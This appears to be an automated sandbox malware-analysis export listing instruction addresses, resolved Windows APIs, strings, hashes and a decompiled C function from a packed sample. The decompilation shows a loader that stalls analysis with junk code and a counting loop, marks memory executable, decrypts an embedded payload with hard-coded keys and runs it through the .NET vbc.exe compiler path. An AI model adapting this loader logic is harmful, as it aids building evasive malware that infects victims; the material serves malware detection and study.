0x00401db7
0x00401dbd
0x00401dc2
0x00401dca
0x00401dd3
0x00401dd3
0x00401ddc
0x00401de2
0x00401de8
0x00401ded
0x00401df5
0x00401dfe
0x00401dfe
0x00401e07
0x00401e0d
0x00401e13
0x00401e18
0x00401e20
0x00401e29
0x00401e29
0x00401e32
0x00401e3b
0x00401e44
0x00401e4a
0x00401e50
0x00401e55
0x00401e5d
0x00401e66
0x00401e66
0x00401e6f
0x00401e75
0x00401e7b
0x00401e80
0x00401e88
0x00401e91
0x00401e91
0x00401e9a
0x00401ea0
0x00401ea6
0x00401eab
0x00401eb3
0x00401ebc
0x00401ebc
0x00401ec5
0x00401ecb
0x00401ed1
0x00401ed6
0x00401ede
0x00401ee7
0x00401ee7
0x00401ef0
0x00401ef6
0x00401efc
0x00401f01
0x00401f09
0x00401f12
0x00401f12
0x00401f1b
0x00401f24
0x00401f2d
0x00401f33
0x00401f39
0x00401f3e
0x00401f46
0x00401f4f
0x00401f4f
0x00401f58
0x00401f5e
0x00401f64
0x00401f69
0x00401f71
0x00401f7a
0x00401f7a
0x00401f83
0x00401f89
0x00401f8f
0x00401f94
0x00401f9c
0x00401fa5
0x00401fa5
0x00401fae
0x00401fb4
0x00401fba
0x00401fbf
0x00401fc7
0x00401fd0
0x00401fd0
0x00401fd9
0x00401fdf
0x00401fe5
0x00401fea
0x00401ff2
0x00401ffb
0x00401ffb
0x00401ffe
0x00402002
0x00402006
0x0040200a
0x0040200e
0x00402012
0x00402016
0x0040201a
0x0040201e
0x00402022
0x00402026
0x0040202a
0x0040202e
0x00402032
0x00402036
0x0040203a
0x0040204c
0x0040205d
0x00402070
0x0040207a
0x00402083
0x0040208d
0x00402096
0x004020a2
0x004020ac
0x004020b6
0x004020bf
0x004020c9
0x004020d6
0x004020df
0x004020ec
0x004020fe
0x00402108
0x00402111
0x00402046
0x00402049
0x00402049
0x00402120
0x00402129
0x00402132
0x00402138
0x0040213e
0x00402143
0x0040214b
0x00402154
0x00402154
0x0040215d
0x00402163
0x00402169
0x0040216e
0x00402176
0x0040217f
0x0040217f
0x00402188
0x0040218e
0x00402194
0x00402199
0x004021a1
0x004021aa
0x004021aa
0x004021b3
0x004021b9
0x004021bf
0x004021c4
0x004021cc
0x004021d5
0x004021d5
0x004021de
0x004021e4
0x004021ea
0x004021ef
0x004021f7
0x00402200
0x00402200
0x00402209
0x00402212
0x0040221b
0x00402221
0x00402227
0x0040222c
0x00402234
0x0040223d
0x0040223d
0x00402246
0x0040224c
0x00402252
0x00402257
0x0040225f
0x00402268
0x00402268
0x00402271
0x00402277
0x0040227d
0x00402282
0x0040228a
0x00402293
0x00402293
0x0040229c
0x004022a2
0x004022a8
0x004022ad
0x004022b5
0x004022be
0x004022be
0x004022c7
0x004022cd
0x004022d3
0x004022d8
0x004022e0
0x004022e9
0x004022e9
0x004022f2
0x004022fb
0x00402304
0x0040230a
0x00402310
0x00402315
0x0040231d
0x00402326
0x00402326
0x0040232f
0x00402335
0x0040233b
0x00402340
0x00402348
0x00402351
0x00402351
0x0040235a
0x00402360
0x00402366
0x0040236b
0x00402373
0x0040237c
0x0040237c
0x00402385
0x0040238b
0x00402391
0x00402396
0x0040239e
0x004023a7
0x004023a7
0x004023b0
0x004023b6
0x004023bc
0x004023c1
0x004023c9
0x004023d2
0x004023d2
0x004023db
0x004023e4
0x004023ed
0x004023f3
0x004023f9
0x004023fe
0x00402406
0x0040240f
0x0040240f
0x00402418
0x0040241e
0x00402424
0x00402429
0x00402431
0x0040243a
0x0040243a
0x00402443
0x00402449
0x0040244f
0x00402454
0x0040245c
0x00402465
0x00402465
0x0040246e
0x00402474
0x0040247a
0x0040247f
0x00402487
0x00402490
0x00402490
0x00402499
0x0040249f
0x004024a5
0x004024aa
0x004024b2
0x004024bb
0x004024bb
0x004024c4
0x004024cd
0x004024d6
0x004024dc
0x004024e2
0x004024e7
0x004024ef
0x004024f8
0x004024f8
0x00402501
0x00402507
0x0040250d
0x00402512
0x0040251a
0x00402523
0x00402523
0x0040252c
0x00402532
0x00402538
0x0040253d
0x00402545
0x0040254e
0x0040254e
0x00402557
0x0040255d
0x00402563
0x00402568
0x00402570
0x00402579
0x00402579
0x00402582
0x00402588
0x0040258e
0x00402593
0x0040259b
0x004025a4
0x004025a4
0x004025ad
0x004025b6
0x004025bf
0x004025c5
0x004025cb
0x004025d0
0x004025d8
0x004025e1
0x004025e1
0x004025ea
0x004025f0
0x004025f6
0x004025fb
0x00402603
0x0040260c
0x0040260c
0x00402615
0x0040261b
0x00402621
0x00402626
0x0040262e
0x00402637
0x00402637
0x00402640
0x00402646
0x0040264c
0x00402651
0x00402659
0x00402662
0x00402662
0x0040266b
0x00402671
0x00402677
0x0040267c
0x00402684
0x0040268d
0x0040268d
0x00402696
0x0040269f
0x004026a8
0x004026ae
0x004026b4
0x004026b9
0x004026c1
0x004026ca
0x004026ca
0x004026d3
0x004026d9
0x004026df
0x004026e4
0x004026ec
0x004026f5
0x004026f5
0x004026fe
0x00402704
0x0040270a
0x0040270f
0x00402717
0x00402720
0x00402720
0x00402729
0x0040272f
0x00402735
0x0040273a
0x00402742
0x0040274b
0x0040274b
0x00402754
0x0040275a
0x00402760
0x00402765
0x0040276d
0x00402776
0x00402776
0x0040277f
0x00402788
0x00402791
0x00402797
0x0040279d
0x004027a2
0x004027aa
0x004027b3
0x004027b3
0x004027bc
0x004027c2
0x004027c8
0x004027cd
0x004027d5
0x004027de
0x004027de
0x004027e7
0x004027ed
0x004027f3
0x004027f8
0x00402800
0x00402809
0x00402809
0x00402812
0x00402818
0x0040281e
0x00402823
0x0040282b
0x00402834
0x00402834
0x0040283d
0x00402843
0x00402849
0x0040284e
0x00402856
0x0040285f
0x0040285f
0x00402862
0x00402866
0x0040286a
0x0040286e
0x00402872
0x00402876
0x0040287a
0x0040287e
0x00402882
0x00402886
0x0040288a
0x0040288e
0x00402892
0x00402896
0x004028a8
0x004028b9
0x004028c3
0x004028d6
0x004028e3
0x004028ec
0x004028f6
0x004028ff
0x00402912
0x0040291b
0x00402925
0x0040292f
0x00402939
0x00402943
0x0040294d
0x00402960
0x0040296c
0x00402975
0x004028a5
0x004028a5
0x00402988
0x0040298b
0x004029a0
0x004029b3
0x004029c0

APIs

GetModuleHandleA.KERNEL32(00000053), ref: 00402982
GetProcAddress.KERNEL32(?,00000004), ref: 0040299A
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 004029B3

Strings

6, xrefs: 00402882
c, xrefs: 0040202A
n, xrefs: 00402032
S, xrefs: 00402862
E, xrefs: 0040286E
1, xrefs: 00402022
w, xrefs: 0040287E
/, xrefs: 00402012
,, xrefs: 0040200A
`ghv, xrefs: 004029A0, 004029B3
O, xrefs: 00402026
t, xrefs: 00402872
C, xrefs: 0040202E

Memory Dump Source

Source File: 00000000.00000002.303536971.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.303524803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303587969.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303597691.0000000000413000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303608357.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.303642442.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hZDPlQwZ9D.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID: ,$/$1$6$C$E$O$S$`ghv$c$n$t$w
API String ID: 2099061454-261305040
Opcode ID: d40cb71df98ad919d13e39e35713d9a7d4401f5ff7ca1da1de6bcb6563a735b6
Instruction ID: 7ac349ba3102cdaeebbc5dc5826948b3e9bce7f52ee76ed208054a7ecb64ce71
Opcode Fuzzy Hash: d40cb71df98ad919d13e39e35713d9a7d4401f5ff7ca1da1de6bcb6563a735b6
Instruction Fuzzy Hash: 5EB27B70A06159EBDB008B95FA982EDBF71FB95391F9281A5D1D4360ADC3B411B1CF0E

Uniqueness

Uniqueness Score: -1.00%

Function 00403150 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 1000
sleepCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00403150(signed int __eax, intOrPtr __edx) {
				intOrPtr _v8;
				signed char _v16;
				intOrPtr _v24;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v72;
				long _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				long _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				long _v120;
				long _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				signed char _t531;
				intOrPtr _t532;
				void* _t536;
				intOrPtr _t540;

				_t540 = __edx;
				_t531 = __eax;
				_v56 =  *0x410fe0;
				_v56 =  *0x410fdc;
				_v56 =  *0x410fd8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((__eax & 0x00000044) == 0) {
					_v56 =  *0x410fd4;
					_v56 =  *0x410fd0;
				}
				_v56 =  *0x410fcc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v56 =  *0x410fc8;
					_v56 =  *0x410fc4;
				}
				_v56 =  *0x410fc0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v56 =  *0x410fbc;
					_v56 =  *0x410fb8;
				}
				_v56 =  *0x410fb4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v56 =  *0x410fb0;
					_v56 =  *0x410fac;
				}
				_v56 =  *0x410fa8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v56 =  *0x410fa4;
					_v56 =  *0x410fa0;
				}
				_v24 =  *0x410f9c;
				_v24 =  *0x410f98;
				_v24 =  *0x410f94;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v24 =  *0x410f90;
					_v24 =  *0x410f8c;
				}
				_v24 =  *0x410f88;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v24 =  *0x410f84;
					_v24 =  *0x410f80;
				}
				_v24 =  *0x410f7c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v24 =  *0x410f78;
					_v24 =  *0x410f74;
				}
				_v24 =  *0x410f70;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v24 =  *0x410f6c;
					_v24 =  *0x410f68;
				}
				_v24 =  *0x410f64;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v24 =  *0x410f60;
					_v24 =  *0x410f5c;
				}
				_v36 =  *0x410f58;
				_v36 =  *0x410f54;
				_v36 =  *0x410f50;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v36 =  *0x410f4c;
					_v36 =  *0x410f48;
				}
				_v36 =  *0x410f44;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v36 =  *0x410f40;
					_v36 =  *0x410f3c;
				}
				_v36 =  *0x410f38;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v36 =  *0x410f34;
					_v36 =  *0x410f30;
				}
				_v36 =  *0x410f2c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v36 =  *0x410f28;
					_v36 =  *0x410f24;
				}
				_v36 =  *0x410f20;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v36 =  *0x410f1c;
					_v36 =  *0x410f18;
				}
				_v48 =  *0x410f14;
				_v48 =  *0x410f10;
				_v48 =  *0x410f0c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v48 =  *0x410f08;
					_v48 =  *0x410f04;
				}
				_v48 =  *0x410f00;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v48 =  *0x410efc;
					_v48 =  *0x410ef8;
				}
				_v48 =  *0x410ef4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v48 =  *0x410ef0;
					_v48 =  *0x410eec;
				}
				_v48 =  *0x410ee8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v48 =  *0x410ee4;
					_v48 =  *0x410ee0;
				}
				_v48 =  *0x410edc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v48 =  *0x410ed8;
					_v48 =  *0x410ed4;
				}
				_v52 =  *0x410ed0;
				_v52 =  *0x410ecc;
				_v52 =  *0x410ec8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v52 =  *0x410ec4;
					_v52 =  *0x410ec0;
				}
				_v52 =  *0x410ebc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v52 =  *0x410eb8;
					_v52 =  *0x410eb4;
				}
				_v52 =  *0x410eb0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v52 =  *0x410eac;
					_v52 =  *0x410ea8;
				}
				_v52 =  *0x410ea4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v52 =  *0x410ea0;
					_v52 =  *0x410e9c;
				}
				_v52 =  *0x410e98;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v52 =  *0x410e94;
					_v52 =  *0x410e90;
				}
				_v72 =  *0x410e8c;
				_v72 =  *0x410e88;
				_v72 =  *0x410e84;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v72 =  *0x410e80;
					_v72 =  *0x410e7c;
				}
				_v72 =  *0x410e78;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v72 =  *0x410e74;
					_v72 =  *0x410e70;
				}
				_v72 =  *0x410e6c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v72 =  *0x410e68;
					_v72 =  *0x410e64;
				}
				_v72 =  *0x410e60;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v72 =  *0x410e5c;
					_v72 =  *0x410e58;
				}
				_v72 =  *0x410e54;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v72 =  *0x410e50;
					_v72 =  *0x410e4c;
				}
				_v44 =  *0x410e48;
				_v44 =  *0x410e44;
				_v44 =  *0x410e40;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v44 =  *0x410e3c;
					_v44 =  *0x410e38;
				}
				_v44 =  *0x410e34;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v44 =  *0x410e30;
					_v44 =  *0x410e2c;
				}
				_v44 =  *0x410e28;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v44 =  *0x410e24;
					_v44 =  *0x410e20;
				}
				_v44 =  *0x410e1c;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v44 =  *0x410e18;
					_v44 =  *0x410e14;
				}
				_v44 =  *0x410e10;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v44 =  *0x410e0c;
					_v44 =  *0x410e08;
				}
				_v8 =  *0x410e04;
				_v8 =  *0x410e00;
				_v8 =  *0x410dfc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v8 =  *0x410df8;
					_v8 =  *0x410df4;
				}
				_v8 =  *0x410df0;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v8 =  *0x410dec;
					_v8 =  *0x410de8;
				}
				_v8 =  *0x410de4;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v8 =  *0x410de0;
					_v8 =  *0x410ddc;
				}
				_v8 =  *0x410dd8;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v8 =  *0x410dd4;
					_v8 =  *0x410dd0;
				}
				_v8 =  *0x410dcc;
				asm("fcomp qword [0x410528]");
				asm("fnstsw ax");
				if((_t531 & 0x00000044) == 0) {
					_v8 =  *0x410dc8;
					_v8 =  *0x410dc4;
				}
				Sleep(0); // executed
				_v76 = 0;
				_v16 = 0;
				_v16 = 0;
				while(_v16 < 0x2e422) {
					_v76 = _v76 + 1;
					_t531 = _v16 + 1;
					_v16 = _t531;
				}
				if(_v76 == 0x2e422) {
					_v124 = 0;
					_v96 = 0;
					_v112 = 0x590813;
					_v104 =  *0x410dc0;
					_v120 = 0;
					_v88 =  *0x410dbc;
					_v88 =  *0x410db8;
					_v88 =  *0x410db4;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v88 =  *0x410db0;
						_v88 =  *0x410dac;
					}
					_v88 =  *0x410da8;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v88 =  *0x410da4;
						_v88 =  *0x410da0;
					}
					_v88 =  *0x410d9c;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v88 =  *0x410d98;
						_v88 =  *0x410d94;
					}
					_v88 =  *0x410d90;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v88 =  *0x410d8c;
						_v88 =  *0x410d88;
					}
					_v88 =  *0x410d84;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v88 =  *0x410d80;
						_v88 =  *0x410d7c;
					}
					_v144 =  *0x410d78;
					_v144 =  *0x410d74;
					_v144 =  *0x410d70;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v144 =  *0x410d6c;
						_v144 =  *0x410d68;
					}
					_v144 =  *0x410d64;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v144 =  *0x410d60;
						_v144 =  *0x410d5c;
					}
					_v144 =  *0x410d58;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v144 =  *0x410d54;
						_v144 =  *0x410d50;
					}
					_v144 =  *0x410d4c;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v144 =  *0x410d48;
						_v144 =  *0x410d44;
					}
					_v144 =  *0x410d40;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v144 =  *0x410d3c;
						_v144 =  *0x410d38;
					}
					_v140 =  *0x410d34;
					_v140 =  *0x410d30;
					_v140 =  *0x410d2c;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v140 =  *0x410d28;
						_v140 =  *0x410d24;
					}
					_v140 =  *0x410d20;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v140 =  *0x410d1c;
						_v140 =  *0x410d18;
					}
					_v140 =  *0x410d14;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v140 =  *0x410d10;
						_v140 =  *0x410d0c;
					}
					_v140 =  *0x410d08;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v140 =  *0x410d04;
						_v140 =  *0x410d00;
					}
					_v140 =  *0x410cfc;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v140 =  *0x410cf8;
						_v140 =  *0x410cf4;
					}
					_v108 =  *0x410cf0;
					_v108 =  *0x410cec;
					_v108 =  *0x410ce8;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v108 =  *0x410ce4;
						_v108 =  *0x410ce0;
					}
					_v108 =  *0x410cdc;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v108 =  *0x410cd8;
						_v108 =  *0x410cd4;
					}
					_v108 =  *0x410cd0;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v108 =  *0x410ccc;
						_v108 =  *0x410cc8;
					}
					_v108 =  *0x410cc4;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v108 =  *0x410cc0;
						_v108 =  *0x410cbc;
					}
					_v108 =  *0x410cb8;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v108 =  *0x410cb4;
						_v108 =  *0x410cb0;
					}
					_v100 =  *0x410cac;
					_v100 =  *0x410ca8;
					_v100 =  *0x410ca4;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v100 =  *0x410ca0;
						_v100 =  *0x410c9c;
					}
					_v100 =  *0x410c98;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v100 =  *0x410c94;
						_v100 =  *0x410c90;
					}
					_v100 =  *0x410c8c;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v100 =  *0x410c88;
						_v100 =  *0x410c84;
					}
					_v100 =  *0x410c80;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v100 =  *0x410c7c;
						_v100 =  *0x410c78;
					}
					_v100 =  *0x410c74;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v100 =  *0x410c70;
						_v100 =  *0x410c6c;
					}
					_v136 =  *0x410c68;
					_v136 =  *0x410c64;
					_v136 =  *0x410c60;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v136 =  *0x410c5c;
						_v136 =  *0x410c58;
					}
					_v136 =  *0x410c54;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v136 =  *0x410c50;
						_v136 =  *0x410c4c;
					}
					_v136 =  *0x410c48;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v136 =  *0x410c44;
						_v136 =  *0x410c40;
					}
					_v136 =  *0x410c3c;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v136 =  *0x410c38;
						_v136 =  *0x410c34;
					}
					_v136 =  *0x410c30;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v136 =  *0x410c2c;
						_v136 =  *0x410c28;
					}
					_v84 =  *0x410c24;
					_v84 =  *0x410c20;
					_v84 =  *0x410c1c;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v84 =  *0x410c18;
						_v84 =  *0x410c14;
					}
					_v84 =  *0x410c10;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v84 =  *0x410c0c;
						_v84 =  *0x410c08;
					}
					_v84 =  *0x410c04;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v84 =  *0x410c00;
						_v84 =  *0x410bfc;
					}
					_v84 =  *0x410bf8;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v84 =  *0x410bf4;
						_v84 =  *0x410bf0;
					}
					_v84 =  *0x410bec;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v84 =  *0x410be8;
						_v84 =  *0x410be4;
					}
					_v80 =  *0x410be0;
					_v80 =  *0x410bdc;
					_v80 =  *0x410bd8;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v80 =  *0x410bd4;
						_v80 =  *0x410bd0;
					}
					_v80 =  *0x410bcc;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v80 =  *0x410bc8;
						_v80 =  *0x410bc4;
					}
					_v80 =  *0x410bc0;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v80 =  *0x410bbc;
						_v80 =  *0x410bb8;
					}
					_v80 =  *0x410bb4;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v80 =  *0x410bb0;
						_v80 =  *0x410bac;
					}
					_v80 =  *0x410ba8;
					asm("fcomp qword [0x410528]");
					asm("fnstsw ax");
					if((_t531 & 0x00000044) == 0) {
						_v80 =  *0x410ba4;
						_v80 =  *0x410ba0;
					}
					_t532 = E004018B0(_t531,  &E00413008, 0x77e); // executed
					_v132 = _t532;
					_v128 = _t540;
					_v116 = E004029D0(E00401810("HlIVbkHc8U9zbBwO3ukTkIbVejxe1DfTO0PjmmPl9OT54V2BrQBKJkgwoxuq1LkNtzAbCNjb5vLKHlC0EzuWZJKNpQ",  &E00413008, 0x77e, 0x5b));
					E00401000(_t534, "Y1Z1f0469GOQVOy8Fh4i54aGWYv4nsdPwhcgbTdetiwTl8tIqPp131NFy3xWJ602ygWwjiGgRB6k3P85rwL2Anbuk0", 0x413788, 0x21a00); // executed
					_t536 =  *((intOrPtr*)(_v116 +  &E00413008))(L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe", 0, 0x413788, 0x5b); // executed
					return _t536;
				}
				return _t531;
			}

0x00403150
0x00403150
0x0040315f
0x00403168
0x00403171
0x00403177
0x0040317d
0x00403182
0x0040318a
0x00403193
0x00403193
0x0040319c
0x004031a2
0x004031a8
0x004031ad
0x004031b5
0x004031be
0x004031be
0x004031c7
0x004031cd
0x004031d3
0x004031d8
0x004031e0
0x004031e9
0x004031e9
0x004031f2
0x004031f8
0x004031fe
0x00403203
0x0040320b
0x00403214
0x00403214
0x0040321d
0x00403223
0x00403229
0x0040322e
0x00403236
0x0040323f
0x0040323f
0x00403248
0x00403251
0x0040325a
0x00403260
0x00403266
0x0040326b
0x00403273
0x0040327c
0x0040327c
0x00403285
0x0040328b
0x00403291
0x00403296
0x0040329e
0x004032a7
0x004032a7
0x004032b0
0x004032b6
0x004032bc
0x004032c1
0x004032c9
0x004032d2
0x004032d2
0x004032db
0x004032e1
0x004032e7
0x004032ec
0x004032f4
0x004032fd
0x004032fd
0x00403306
0x0040330c
0x00403312
0x00403317
0x0040331f
0x00403328
0x00403328
0x00403331
0x0040333a
0x00403343
0x00403349
0x0040334f
0x00403354
0x0040335c
0x00403365
0x00403365
0x0040336e
0x00403374
0x0040337a
0x0040337f
0x00403387
0x00403390
0x00403390
0x00403399
0x0040339f
0x004033a5
0x004033aa
0x004033b2
0x004033bb
0x004033bb
0x004033c4
0x004033ca
0x004033d0
0x004033d5
0x004033dd
0x004033e6
0x004033e6
0x004033ef
0x004033f5
0x004033fb
0x00403400
0x00403408
0x00403411
0x00403411
0x0040341a
0x00403423
0x0040342c
0x00403432
0x00403438
0x0040343d
0x00403445
0x0040344e
0x0040344e
0x00403457
0x0040345d
0x00403463
0x00403468
0x00403470
0x00403479
0x00403479
0x00403482
0x00403488
0x0040348e
0x00403493
0x0040349b
0x004034a4
0x004034a4
0x004034ad
0x004034b3
0x004034b9
0x004034be
0x004034c6
0x004034cf
0x004034cf
0x004034d8
0x004034de
0x004034e4
0x004034e9
0x004034f1
0x004034fa
0x004034fa
0x00403503
0x0040350c
0x00403515
0x0040351b
0x00403521
0x00403526
0x0040352e
0x00403537
0x00403537
0x00403540
0x00403546
0x0040354c
0x00403551
0x00403559
0x00403562
0x00403562
0x0040356b
0x00403571
0x00403577
0x0040357c
0x00403584
0x0040358d
0x0040358d
0x00403596
0x0040359c
0x004035a2
0x004035a7
0x004035af
0x004035b8
0x004035b8
0x004035c1
0x004035c7
0x004035cd
0x004035d2
0x004035da
0x004035e3
